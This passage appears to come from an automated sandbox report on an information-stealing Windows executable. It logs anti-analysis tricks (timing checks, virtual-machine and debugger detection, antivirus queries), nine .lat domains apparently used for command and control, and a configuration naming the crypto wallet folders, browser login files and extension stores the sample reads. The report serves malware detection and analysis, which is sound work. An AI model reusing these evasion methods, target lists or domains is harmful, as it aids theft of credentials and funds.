                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50F0234 second address: 50F029C instructions: 0x00000000 rdtsc 0x00000002 call 00007F9C80FB5672h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov edi, 00000000h 0x00000010 pushad 0x00000011 call 00007F9C80FB566Ch 0x00000016 mov edx, eax 0x00000018 pop eax 0x00000019 mov bx, B542h 0x0000001d popad 0x0000001e inc ebx 0x0000001f jmp 00007F9C80FB5679h 0x00000024 test al, al 0x00000026 jmp 00007F9C80FB566Eh 0x0000002b je 00007F9C80FB5870h 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 popad 0x00000037 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50F029C second address: 50F02B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C81394C09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50F0325 second address: 50F032B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50F032B second address: 50F032F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50F032F second address: 50F0333 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50F0333 second address: 50F0373 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jmp 00007F9C81394C04h 0x0000000e push eax 0x0000000f jmp 00007F9C81394BFBh 0x00000014 nop 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 call 00007F9C81394C02h 0x0000001d pop ecx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50F03E3 second address: 50F042C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 pushfd 0x00000007 jmp 00007F9C80FB566Bh 0x0000000c and si, 51FEh 0x00000011 jmp 00007F9C80FB5679h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a jg 00007F9CF28236DBh 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F9C80FB566Dh 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50F042C second address: 50F0456 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C81394C01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F9C81394C4Fh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F9C81394BFDh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50F0456 second address: 50F0466 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9C80FB566Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50F0466 second address: 50F046A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50F046A second address: 50F0519 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [ebp-14h], edi 0x0000000b pushad 0x0000000c jmp 00007F9C80FB566Dh 0x00000011 movzx eax, bx 0x00000014 popad 0x00000015 jne 00007F9CF282367Ah 0x0000001b jmp 00007F9C80FB5673h 0x00000020 mov ebx, dword ptr [ebp+08h] 0x00000023 jmp 00007F9C80FB5676h 0x00000028 lea eax, dword ptr [ebp-2Ch] 0x0000002b jmp 00007F9C80FB5670h 0x00000030 xchg eax, esi 0x00000031 jmp 00007F9C80FB5670h 0x00000036 push eax 0x00000037 jmp 00007F9C80FB566Bh 0x0000003c xchg eax, esi 0x0000003d pushad 0x0000003e mov ax, 2FBBh 0x00000042 pushfd 0x00000043 jmp 00007F9C80FB5670h 0x00000048 or si, CC08h 0x0000004d jmp 00007F9C80FB566Bh 0x00000052 popfd 0x00000053 popad 0x00000054 nop 0x00000055 push eax 0x00000056 push edx 0x00000057 push eax 0x00000058 push edx 0x00000059 pushad 0x0000005a popad 0x0000005b rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50F0519 second address: 50F051D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50F051D second address: 50F0523 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50F0523 second address: 50F0529 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50F0529 second address: 50F052D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50F052D second address: 50F053E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov edx, ecx 0x0000000e push esi 0x0000000f pop edi 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50F053E second address: 50F05A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, EDh 0x00000005 mov ecx, 27A572F3h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e pushad 0x0000000f call 00007F9C80FB5674h 0x00000014 pushfd 0x00000015 jmp 00007F9C80FB5672h 0x0000001a add ecx, 53D74328h 0x00000020 jmp 00007F9C80FB566Bh 0x00000025 popfd 0x00000026 pop esi 0x00000027 popad 0x00000028 xchg eax, ebx 0x00000029 jmp 00007F9C80FB5672h 0x0000002e push eax 0x0000002f pushad 0x00000030 push eax 0x00000031 push edx 0x00000032 mov dx, A5D2h 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50F05A3 second address: 50F05AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50F05AC second address: 50F05CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 xchg eax, ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F9C80FB5673h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50F05CA second address: 50F05CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50F05CE second address: 50F05D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50F0632 second address: 50F0649 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C81394BFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50F0649 second address: 50F064D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50F064D second address: 50F0653 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe Special instruction interceptor: First address: AD7AF0 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe Special instruction interceptor: First address: C7A6DF instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe Special instruction interceptor: First address: AD7ABB instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe TID: 1584 Thread sleep time: -270000s >= -30000s
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe TID: 4208 Thread sleep time: -30000s >= -30000s
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: tPSrcPbmRe.exe, 00000000.00000003.2245573631.0000000005B1E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                Source: tPSrcPbmRe.exe, 00000000.00000002.2375970033.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: tPSrcPbmRe.exe, 00000000.00000003.2245573631.0000000005B1E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                Source: tPSrcPbmRe.exe, 00000000.00000003.2245573631.0000000005B1E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
                Source: tPSrcPbmRe.exe, 00000000.00000003.2245573631.0000000005B1E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696487552f
                Source: tPSrcPbmRe.exe, 00000000.00000003.2245573631.0000000005B1E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696487552x
                Source: tPSrcPbmRe.exe, 00000000.00000003.2245573631.0000000005B1E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
                Source: tPSrcPbmRe.exe, tPSrcPbmRe.exe, 00000000.00000003.2336843987.00000000012EA000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2198657134.00000000012ED000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000002.2377002468.00000000012EE000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2223056639.00000000012ED000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2267092336.00000000012EA000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2375411067.0000000001297000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2271074155.00000000012ED000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000002.2376803403.0000000001299000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2221021952.00000000012ED000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2293140651.00000000012EA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                Source: tPSrcPbmRe.exe, 00000000.00000003.2245573631.0000000005B1E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696487552
                Source: tPSrcPbmRe.exe, 00000000.00000003.2336843987.00000000012EA000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2198657134.00000000012ED000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000002.2377002468.00000000012EE000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2223056639.00000000012ED000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2267092336.00000000012EA000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2271074155.00000000012ED000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2221021952.00000000012ED000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2293140651.00000000012EA000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2297990501.00000000012ED000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWen-GBn
                Source: tPSrcPbmRe.exe, 00000000.00000003.2245573631.0000000005B1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                Source: tPSrcPbmRe.exe, 00000000.00000003.2245573631.0000000005B1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                Source: tPSrcPbmRe.exe, 00000000.00000003.2245573631.0000000005B1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
                Source: tPSrcPbmRe.exe, 00000000.00000003.2245573631.0000000005B1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
                Source: tPSrcPbmRe.exe, 00000000.00000003.2245573631.0000000005B23000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696487552p
                Source: tPSrcPbmRe.exe, 00000000.00000003.2245573631.0000000005B1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
                Source: tPSrcPbmRe.exe, 00000000.00000003.2245573631.0000000005B1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                Source: tPSrcPbmRe.exe, 00000000.00000003.2245573631.0000000005B1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
                Source: tPSrcPbmRe.exe, 00000000.00000003.2245573631.0000000005B1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
                Source: tPSrcPbmRe.exe, 00000000.00000003.2245573631.0000000005B1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                Source: tPSrcPbmRe.exe, 00000000.00000003.2245573631.0000000005B1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                Source: tPSrcPbmRe.exe, 00000000.00000003.2245573631.0000000005B1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                Source: tPSrcPbmRe.exe, 00000000.00000003.2245573631.0000000005B1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                Source: tPSrcPbmRe.exe, 00000000.00000003.2245573631.0000000005B1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                Source: tPSrcPbmRe.exe, 00000000.00000003.2245573631.0000000005B1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                Source: tPSrcPbmRe.exe, 00000000.00000003.2245573631.0000000005B1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
                Source: tPSrcPbmRe.exe, 00000000.00000003.2245573631.0000000005B1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                Source: tPSrcPbmRe.exe, 00000000.00000003.2245573631.0000000005B1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                Source: tPSrcPbmRe.exe, 00000000.00000003.2245573631.0000000005B1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                Source: tPSrcPbmRe.exe, 00000000.00000003.2245573631.0000000005B1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
                Source: tPSrcPbmRe.exe, 00000000.00000003.2245573631.0000000005B1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                Source: tPSrcPbmRe.exe, 00000000.00000003.2245573631.0000000005B1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                Source: tPSrcPbmRe.exe, 00000000.00000003.2245573631.0000000005B1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                Source: tPSrcPbmRe.exe, 00000000.00000002.2375970033.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: tPSrcPbmRe.exe, 00000000.00000003.2245573631.0000000005B1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                Source: tPSrcPbmRe.exe, 00000000.00000003.2245573631.0000000005B1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: NTICE
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: SICE
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: SIWVID
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe Process queried: DebugPort

                HIPS / PFW / Operating System Protection Evasion

                Source: tPSrcPbmRe.exe, 00000000.00000002.2375882794.0000000000A81000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: rapeflowwj.lat
                Source: tPSrcPbmRe.exe, 00000000.00000002.2375882794.0000000000A81000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: crosshuaht.lat
                Source: tPSrcPbmRe.exe, 00000000.00000002.2375882794.0000000000A81000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: sustainskelet.lat
                Source: tPSrcPbmRe.exe, 00000000.00000002.2375882794.0000000000A81000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: aspecteirs.lat
                Source: tPSrcPbmRe.exe, 00000000.00000002.2375882794.0000000000A81000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: energyaffai.lat
                Source: tPSrcPbmRe.exe, 00000000.00000002.2375882794.0000000000A81000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: necklacebudi.lat
                Source: tPSrcPbmRe.exe, 00000000.00000002.2375882794.0000000000A81000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: discokeyus.lat
                Source: tPSrcPbmRe.exe, 00000000.00000002.2375882794.0000000000A81000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: grannyejh.lat
                Source: tPSrcPbmRe.exe, 00000000.00000002.2375882794.0000000000A81000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: sweepyribs.lat
                Source: tPSrcPbmRe.exe, 00000000.00000002.2375970033.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Program Manager
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: tPSrcPbmRe.exe, tPSrcPbmRe.exe, 00000000.00000003.2320110166.00000000012C6000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2369333103.00000000012C6000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2375411067.00000000012C6000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2320002297.0000000001354000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000002.2376803403.00000000012C6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                Source: Yara match File source: Process Memory Space: tPSrcPbmRe.exe PID: 6480, type: MEMORYSTR
                Source: Yara match File source: sslproxydump.pcap, type: PCAP
                Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
                Source: tPSrcPbmRe.exe String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                Source: tPSrcPbmRe.exe String found in binary or memory: \??\C:\Users\user\AppData\Roaming\ElectronCash\wallets
                Source: tPSrcPbmRe.exe String found in binary or memory: "app-store.json",".finger-print.fp","simple-storage.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\IndexedDB","m":["*"],"z":"Wallets/JAXX New Version","d":2,"fs":20971520},{"t":0,"p":"
                Source: tPSrcPbmRe.exe String found in binary or memory: "app-store.json",".finger-print.fp","simple-storage.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\IndexedDB","m":["*"],"z":"Wallets/JAXX New Version","d":2,"fs":20971520},{"t":0,"p":"
                Source: tPSrcPbmRe.exe String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                Source: tPSrcPbmRe.exe String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                Source: tPSrcPbmRe.exe, 00000000.00000003.2294184557.0000000001332000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 0}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":["*"]@
                Source: tPSrcPbmRe.exe, 00000000.00000003.2223056639.00000000012ED000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets;!
                Source: tPSrcPbmRe.exe String found in binary or memory: keystore
                Source: tPSrcPbmRe.exe, 00000000.00000003.2267157700.0000000001330000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflа
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
